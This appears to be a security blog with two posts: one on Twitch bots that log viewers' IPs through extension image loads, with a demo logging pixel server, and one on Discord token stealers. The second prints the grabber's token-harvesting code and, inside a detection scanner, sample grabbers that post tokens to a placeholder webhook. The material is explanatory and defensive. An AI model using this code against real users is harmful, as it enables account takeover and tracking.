tophu8
may contain soy
tophu8 · 3 years ago
Twitch and IP grabbing bots: Annoying pests and how to fight them
This is an old tweet of mine, but I thought I would revive it for the blog.
What is going on?
Recently, many streamers have most likely noticed an uptick in follows from random accounts. These accounts abuse the way Twitch extensions work: specifically, extensions that pull content from third-party servers in order to enhance a stream or a channel description (Stream Schedule & Countdown, Viewer Geolocation, Suggestion Box v2, Score Overlay, etc.). The follow is bait. If you click through to the follower's channel, your browser loads images or web panels for that channel's extensions from external servers, and those servers can log every connection, and by extension, you. Even when the extension developer's own server is trustworthy, some of these extensions let the channel owner configure external image or API URLs, and some have XSS (cross-site scripting) vulnerabilities; either one lets a malicious actor point your browser at a server they control.
What information is being leaked?
Typically what leaks is your IP address, country, ISP, browser version, device type, and operating system. The first three are derived from the IP address; the rest come from the User-Agent header your browser sends with every request, so a plain image load is enough to collect all of it. If script runs in the extension page, it can additionally collect battery level, whether the device is charging, device orientation, screen size, and preferred language.
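To make concrete what "the server may log the connection" means, here is a minimal logging image host. It is an added example, not code from the original post or from any Twitch extension: a tracking pixel served from a made-up path (/pixel.gif), with a simulated viewer whose headers and channel name are constructed sample values. Everything in the log entry arrives with an ordinary image load; no script on the viewer's side is needed.

```python
"""Minimal logging image host: what any third-party server sees when a
viewer's browser fetches an extension resource from it. Added example,
not code from the post; /pixel.gif and the channel name are made up."""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

# 1x1 transparent GIF: the classic tracking-pixel response body
PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00"
             b"\x00\x02\x02D\x01\x00;")

LOG = []  # one entry per request the host observed


def observe(client_ip, path, headers):
    """Record what a plain <img> or fetch() hands over with no client-side
    script at all: address, browser, language, and the page that triggered
    the load (the Referer names the channel the viewer was on)."""
    entry = {
        "ip": client_ip,
        "path": path,
        "user_agent": headers.get("User-Agent"),
        "language": headers.get("Accept-Language"),
        "referer": headers.get("Referer"),
    }
    LOG.append(entry)
    return entry


class GrabberHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        observe(self.client_address[0], self.path, self.headers)
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL_GIF)))
        self.send_header("Cache-Control", "no-store")  # every page load is a fresh hit
        self.end_headers()
        self.wfile.write(PIXEL_GIF)

    def log_message(self, format, *args):  # silence the stdlib access log
        pass


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), GrabberHandler)  # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def simulate_viewer(port, channel="examplestreamer"):
    """Act like a browser that just opened a channel page whose extension
    panel embeds the pixel (constructed header values)."""
    req = Request(f"http://127.0.0.1:{port}/pixel.gif?c={channel}", headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ExampleBrowser/1.0",
        "Accept-Language": "en-US,en;q=0.9",
        "Referer": f"https://www.twitch.tv/{channel}",
    })
    with urlopen(req, timeout=5) as resp:
        return resp.read()


def demo():
    srv = start_server()
    try:
        body = simulate_viewer(srv.server_port)
        return body == PIXEL_GIF, LOG[-1]
    finally:
        srv.shutdown()


if __name__ == "__main__":
    ok, seen = demo()
    print("served pixel:", ok)
    for key, value in seen.items():
        print(f"  {key}: {value}")
```

The Cache-Control: no-store header is the part a real grabber cares about: without it the browser would cache the image and the host would only see the first visit. Behind a VPN or Tor the ip field is the exit address, which is the whole point of those tools.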
Why do these people want this information?
There are a number of reasons someone would collect this information. They could use your IP address to DDoS you; that is most likely aimed at larger streamers. They could also be building a database that maps Twitch users to IP addresses, which can link different Twitch accounts together (two accounts seen from the same address), reveal a streamer's approximate location, and so on.
Should you be concerned?
Yes and no. While privacy is important, the data collected here is visible to any website you visit, so the rule is simply not to expose it to people who have no business seeing it. It's like your physical home address: not secret information, but it is in your best interest not to hand it to everyone. This data usually can't lead straight to your door, but it is useful for estimating your location or tracking you across the internet (cough, advertisers, cough). If you pay your ISP for a static public IP address, be more concerned: static and business allocations can be registered in the public WHOIS database with the subscriber's own contact details, whereas an ordinary dynamic residential address only resolves to the ISP.
What can Twitch do about it?
Besides banning accounts that abuse extensions this way (which may be hard to identify), there is not much Twitch can do. They could forbid extensions from loading external images or calling external APIs, but that would cripple a lot of extensions. Twitch could restrict images to a list of well-known hosts (Imgur and the like), though even an allow-listed host can still log requests; the list only changes who ends up with the logs. Disallowing external API usage outright would break many extensions, would do nothing to make them fixable, and would leave behind a slew of abandoned Twitch extensions.
What can you do about it?
There are a few ways to protect your privacy here. First, use a VPN and/or a privacy-oriented browser mode; note that private browsing alone does not hide your IP address, only a VPN, a proxy, or Tor does that. If you really want to take it to the extreme, use the Tor Browser. Second, don't click on these channels; it's not worth it, there's nothing there. Third, if you have uBlock Origin, add the filter ||ext-twitch.tv^ to your custom filters. That is the domain Twitch serves extensions from, so no extension (malicious or not) will be able to load; take note that you won't be able to view or interact with any Twitch extension until you remove the filter. Finally, if you did click one of these channels and your ISP assigns addresses dynamically, you can change the WAN MAC address in your router settings and reboot the modem and router to be issued a new public IP. Assigning yourself a different static IP on your own network does not help: that changes only your private LAN address, and the public address the attacker logged is controlled by your ISP.
Be safe, friends.
tophu8 · 3 years ago
Malicious Packages on Discord (Stealing Discord Tokens)
There has recently been a surge of Discord token-grabbing malware used to compromise accounts. The continued propagation of the malware is driven by the public's susceptibility to the scam. I would like to explain how it works so that fewer individuals may fall for this in the future.
1) Why steal Discord tokens?
There is a large market for premium accounts and for accounts with rare badges. Attackers often target Discord accounts that have purchased Nitro and try to resell them on online marketplaces such as epicnpc.com or playerup.com.
2) How does it work?
The payload is a token grabber: it reads Discord's local storage from a known location on your computer. The token is the credential the Discord client presents to the API on every request, so whoever holds it is logged in as you without needing your password or your 2FA code. These programs are often not caught by antivirus because they don't register themselves to run at startup, don't copy themselves, and don't modify any files; they only read a few files and send the contents off. In addition, they are often buried inside unrelated code, such as a simple video game or a large amount of filler, to disguise what they do.
3) What does the code look like?
The code is pretty straightforward: it looks in the user's AppData folder for tokens stored in the LevelDB (Local Storage) files of common browsers and the Discord client. The snippet below is the grabber as circulated (reindented, with the imports it needs and comments added); the part that ships the tokens to the attacker is not shown on this page.

    import os
    import re


    def find_tokens(path):
        # Discord and Chromium-based browsers keep Local Storage in LevelDB;
        # tokens sit as plain strings inside the .log and .ldb files.
        path += '\\Local Storage\\leveldb'
        tokens = []
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue
            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                # first pattern: classic user token; second: token of an account with MFA enabled
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens


    def main():
        local = os.getenv('LOCALAPPDATA')
        roaming = os.getenv('APPDATA')
        paths = {
            'Discord': roaming + '\\Discord',
            'Discord Canary': roaming + '\\discordcanary',
            'Discord PTB': roaming + '\\discordptb',
            'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
            'Opera': roaming + '\\Opera Software\\Opera Stable',
            'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
            'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
        }
        found = {}
        for platform, path in paths.items():
            try:
                found[platform] = find_tokens(path)
            except FileNotFoundError:  # client or browser not installed
                continue
        # the grabber then sends whatever it found to the attacker (not shown on this page)
        return found
A well-known variant of this code, PirateStealer, also steals private data such as login information and credit card details from the Discord client.
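Since the grabber's logic is usually buried in unrelated code, a practical check before running a file someone sent you is to scan its source for the strings a token grabber can hardly do without. The following is an added example, not code from this post or from any real stealer: a small static scanner with a hand-picked indicator list (the LevelDB path, the two token regexes quoted above, a Discord webhook URL for exfiltration, dynamic exec/eval) that also unwraps base64-wrapped payloads, which is how a grabber is often hidden inside a "game". The three sample scripts it scans are constructed for the demonstration, and the webhook URL in them is a placeholder.

```python
"""Static indicator scan for Discord token grabbers. Added example; the
indicator list and the sample scripts are this example's own assumptions."""
import base64
import re

# Indicators a token grabber can hardly do without, however much unrelated
# "game" code surrounds them (drawn from the snippet above plus the usual
# exfiltration channel, a Discord webhook URL).
INDICATORS = {
    "reads_discord_leveldb": re.compile(r"Local Storage[\\/]+leveldb", re.I),
    "walks_appdata":         re.compile(r"\b(?:LOCAL)?APPDATA\b"),
    "token_regex":           re.compile(r"mfa\\\.\[\\w-\]\{84\}|\[\\w-\]\{24\}\\\.\[\\w-\]\{6\}"),
    "discord_webhook":       re.compile(r"discord(?:app)?\.com/api/webhooks/", re.I),
    "dynamic_exec":          re.compile(r"\b(?:exec|eval)\s*\("),
}
# Any one of these is damning on its own; the rest are supporting evidence.
STRONG = {"reads_discord_leveldb", "token_regex", "discord_webhook"}

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def unwrap_base64(text, depth=3):
    """Return the text plus every base64 blob in it that decodes to readable
    text, a few layers deep, so exec(b64decode("...")) wrappers hide nothing."""
    layers, frontier = [text], [text]
    for _ in range(depth):
        found = []
        for chunk in frontier:
            for blob in B64_BLOB.findall(chunk):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not base64, or binary: ignore
                if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
                    found.append(decoded)
        layers.extend(found)
        frontier = found
    return layers


def scan_source(text):
    """Return (verdict, sorted indicator names) for one script's source text."""
    hits = set()
    for layer in unwrap_base64(text):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    if hits & STRONG:
        verdict = "token-grabber"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, sorted(hits)


# Constructed samples: a harmless game that keeps its save file under APPDATA,
# a plain grabber in the style of the snippet above, and the same grabber
# wrapped in exec(base64) the way bundled "game" payloads often are.
BENIGN_GAME = '''
import os, json
SAVE_DIR = os.path.join(os.getenv("APPDATA"), "MyGame")
def save(state):
    json.dump(state, open(os.path.join(SAVE_DIR, "save.json"), "w"))
'''

GRABBER_PLAIN = r'''
import os, re, requests
HOOK = "https://discord.com/api/webhooks/000000000000000000/abc"  # placeholder
path = os.getenv("APPDATA") + "\\Discord\\Local Storage\\leveldb"
for f in os.listdir(path):
    data = open(path + "\\" + f, errors="ignore").read()
    for tok in re.findall(r"mfa\.[\w-]{84}", data):
        requests.post(HOOK, json={"content": tok})
'''

GRABBER_WRAPPED = "import base64\nexec(base64.b64decode(%r).decode())\n" % (
    base64.b64encode(GRABBER_PLAIN.encode()).decode())


if __name__ == "__main__":
    for label, src in [("benign game", BENIGN_GAME), ("plain grabber", GRABBER_PLAIN),
                       ("base64-wrapped grabber", GRABBER_WRAPPED)]:
        print(f"{label}: {scan_source(src)}")
```

The benign game touches APPDATA too, which is why a single weak indicator is not enough for a verdict; the LevelDB path, the token regex, and the webhook URL are what separate a grabber from ordinary software. A scanner like this catches the lazy wrappers, not a determined packer, so it complements rather than replaces the advice below about not running files from unverified friends.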
4) What happens when my account is compromised?
When your account is compromised, the bot will most likely message people on your friends list whose badges mark them as valuable targets and, masquerading as you (a trusted source), try to get them to run the same payload you did. After that, the attacker locks you out of the account and posts it for sale on one of these sites for anywhere from a few hundred dollars to a couple of thousand.
5) How to avoid this:
Do not download random files that friends send you out of the blue. If a friend asks you to download something, confirm their identity by asking a question only they would know, ask them to contact you through a different channel (voice call, Twitter, etc.) to confirm, or simply decline. If you think you already ran such a file, change your Discord password, which invalidates the stolen token. People are always the weakest link in cybersecurity, and education is the best way to protect ourselves.